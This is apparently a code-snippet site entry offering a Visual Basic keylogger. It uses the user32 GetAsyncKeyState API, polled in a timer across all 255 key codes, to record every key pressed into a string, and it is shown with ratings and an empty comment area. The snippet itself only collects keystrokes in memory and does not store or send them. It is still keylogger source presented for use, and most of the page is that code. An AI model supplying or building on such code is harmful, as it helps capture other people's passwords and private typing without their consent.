A Key Logger
It Logs Your Key Presses
Place This Code In A Timer On Interval Less Then 20 The Faster It Is The
better But It Consumes More System Rescources
API Declarations
Declare Function GetAsyncKeyState Lib "user32" (ByVal dwMessage As Long) As Integer
Rate A Key Logger
(5(5 Vote))
'Place This Code In A Timer On Interval Less Then 20 The Faster It Is The
'better But It Consumes More System Rescources
Dim KeyLoop As Byte
Dim FoundKeys As String
Dim KeyResult As Long
For KeyLoop = 1 To 255
KeyResult = GetAsyncKeyState(KeyLoop)
If KeyResult = -32767 Then
FoundKeys = FoundKeys + Chr(KeyLoop)
End If
Next
A Key Logger Comments
No comments yet — be the first to post one!
Post a Comment